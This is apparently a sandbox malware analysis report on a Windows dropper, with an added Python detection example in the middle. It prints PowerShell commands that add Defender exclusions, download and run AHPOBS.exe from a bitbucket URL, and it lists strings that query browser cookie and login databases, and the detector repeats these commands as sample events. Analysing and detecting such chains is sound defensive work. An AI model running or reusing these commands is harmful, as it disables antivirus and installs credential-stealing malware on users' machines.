Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe, Code function: 10_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0047C81C

              System Summary

              barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\AHPOBS.exe
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Code functions: 0_2_00000001400138E5, 0_2_00000001400154F0, 0_2_0000000140015160, 0_2_0000000140015170, 0_2_0000000140013175, 0_2_0000000140010210, 0_2_0000000140016210, 0_2_000000014000EA48, 0_2_000000014001366E, 0_2_000000014000B758, 0_2_0000000140012FDD
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code functions: 10_2_004096A0, 10_2_0042200C, 10_2_0041A217, 10_2_00412216, 10_2_0042435D, 10_2_004033C0, 10_2_0044F430, 10_2_004125E8, 10_2_0044663B, 10_2_00413801, 10_2_0042096F, 10_2_004129D0, 10_2_004119E3, 10_2_0041C9AE, 10_2_0047EA6F, 10_2_0040FA10, 10_2_0044EB5F, 10_2_00423C81, 10_2_00411E78, 10_2_00442E0C, 10_2_00420EC0, 10_2_0044CF17, 10_2_00444FD2
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\AHPOBS.exe 7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Windata\svhost.exe 7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: String function: 00445AE0 appears 55 times
Source: classification engine | Classification label: mal100.troj.evad.winEXE@14/14@2/3
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00433EE0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | File created: C:\Users\user\AppData\Roaming\Windata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File created: C:\Users\user\AppData\Local\Temp\AC2F.tmp
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AHPOBS.exe, 0000000A.00000002.3917212918.0000000003E10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT * FROM cookies;r<"m
Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT * FROM moz_cookies;x?`m
Source: AHPOBS.exe, 0000000A.00000002.3917212918.0000000003E10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT * FROM logins;
Source: Gq48hjKhZf.exe | Virustotal: Detection: 56%
Source: Gq48hjKhZf.exe | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Users\user\Desktop\Gq48hjKhZf.exe "C:\Users\user\Desktop\Gq48hjKhZf.exe"
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\AHPOBS.exe C:\Users\user\AppData\Local\Temp\AHPOBS.exe ;
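The process list above is the whole dropper chain in four commands: a batch file spawns PowerShell to add a Defender path exclusion for %TEMP%, downloads AHPOBS.exe into that directory, adds a process exclusion for it, and then runs it. The following is an added detection example, not part of the Joe Sandbox report: it walks process-creation events (constructed here from the report's command lines, with made-up PIDs and an invented ProcEvent record) and raises findings when an exclusion is added, a download lands inside the excluded location, and a binary is executed from it within the same process tree. Rule names and severities are this example's own choices; the regexes assume paths without spaces.

```python
"""Flag the Defender-exclusion -> download -> execute chain on process events.

Added example, not part of the Joe Sandbox report. The sample events below
are constructed from the report's process list; PIDs, the ProcEvent shape,
rule names and severities are this example's own inventions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


# A Defender exclusion being added or set; captures the kind and the target.
EXCL_RE = re.compile(
    r"(?:Add|Set)-MpPreference\b[^\"']*?-Exclusion(Path|Process)\s+['\"]?([^'\"\s]+)", re.I)
# WebClient.DownloadFile(url, destination)
DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
# Invoke-WebRequest / iwr ... -OutFile destination
OUTFILE_RE = re.compile(r"-OutFile\s+['\"]?([^'\"\s]+)", re.I)


def norm(path: str) -> str:
    """Case-fold and strip quotes and a trailing backslash for comparison."""
    return path.strip().strip("'\"").rstrip("\\").lower()


def is_under(path: str, directory: str) -> bool:
    """True when path is the directory itself or lies beneath it."""
    p, d = norm(path), norm(directory)
    return p == d or p.startswith(d + "\\")


def find_exclusion_abuse(events):
    """Return findings, in event order, for exclusion-add, download-into and
    execute-from patterns that share one process tree."""
    by_pid = {e.pid: e for e in events}

    def tree_root(pid: int) -> int:
        while pid in by_pid and by_pid[pid].ppid in by_pid:
            pid = by_pid[pid].ppid
        return pid

    exclusions = []   # (root pid, "path" | "process", target, event)
    findings = []
    for e in events:
        root = tree_root(e.pid)

        m = EXCL_RE.search(e.cmdline)
        if m:
            kind, target = m.group(1).lower(), m.group(2)
            exclusions.append((root, kind, target, e))
            findings.append({"severity": "medium", "rule": "defender_exclusion_added",
                             "pid": e.pid, "target": target})

        dm, om = DOWNLOAD_RE.search(e.cmdline), OUTFILE_RE.search(e.cmdline)
        dest = dm.group(2) if dm else (om.group(1) if om else None)
        if dest:
            for xroot, kind, target, _ in exclusions:
                if xroot == root and kind == "path" and is_under(dest, target):
                    findings.append({"severity": "high", "rule": "download_into_excluded_path",
                                     "pid": e.pid, "target": dest})
                    break

        for xroot, kind, target, xe in exclusions:
            if xroot != root or xe.pid == e.pid:
                continue
            if (kind == "path" and is_under(e.image, target)) or \
               (kind == "process" and norm(e.image) == norm(target)):
                findings.append({"severity": "critical", "rule": "execution_from_excluded_path",
                                 "pid": e.pid, "target": e.image})
                break
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"

# Constructed sample events mirroring the report's process list (PIDs made up).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\Gq48hjKhZf.exe", r'"C:\Users\user\Desktop\Gq48hjKhZf.exe"'),
    ProcEvent(101, 100, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "' + TEMP + r'\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"'),
    ProcEvent(102, 101, PS, r'powershell /nop /com "Add-MpPreference -ExclusionPath ' + TEMP + '"'),
    ProcEvent(103, 101, PS, r'''powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";'''),
    ProcEvent(104, 101, PS, r'powershell /nop /com "Add-MpPreference -ExclusionProcess ' + TEMP + r'\AHPOBS.exe"'),
    ProcEvent(105, 101, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c " + TEMP + r"\AHPOBS.exe;"),
    ProcEvent(106, 105, TEMP + r"\AHPOBS.exe", TEMP + r"\AHPOBS.exe ;"),
    # Benign noise: an admin excludes a build directory; nothing is downloaded to or run from it.
    ProcEvent(200, 50, PS, r'powershell -Command "Add-MpPreference -ExclusionPath C:\build\obj"'),
]

if __name__ == "__main__":
    for f in find_exclusion_abuse(SAMPLE_EVENTS):
        print(f"[{f['severity']:8}] pid={f['pid']} {f['rule']}: {f['target']}")
```

The medium-severity hit fires on its own for any exclusion change, which on a managed fleet should already be rare enough to review; the high and critical rules only fire when the download or execution reuses an exclusion added earlier in the same tree, so the benign build-directory exclusion stays at medium.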
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Sections loaded (in order): apphelp.dll, winmm.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
Source: C:\Windows\System32\cmd.exe | Sections loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\cmd.exe | Sections loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Sections loaded (in order): apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, userenv.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, amsi.dll, profapi.dll, sxs.dll, sspicli.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Gq48hjKhZf.exe | Static PE information: Image base 0x140000000 > 0x60000000

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary
              Source: svhost.exe.10.dr | Static PE information: real checksum: 0xa961f should be: 0x120549
              Source: AHPOBS.exe.6.dr | Static PE information: real checksum: 0xa961f should be: 0x120549
              Source: Gq48hjKhZf.exe | Static PE information: real checksum: 0x0 should be: 0x1e610
              Source: Gq48hjKhZf.exe | Static PE information: section name: .code
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Code function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00416CB5 push ecx; ret 10_2_00416CC8

              Persistence and Installation Behavior

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\AHPOBS.exe (dropped file)
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | File created: C:\Users\user\AppData\Roaming\Windata\svhost.exe (dropped file)

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Process information set: NOOPENFILEERRORBOX
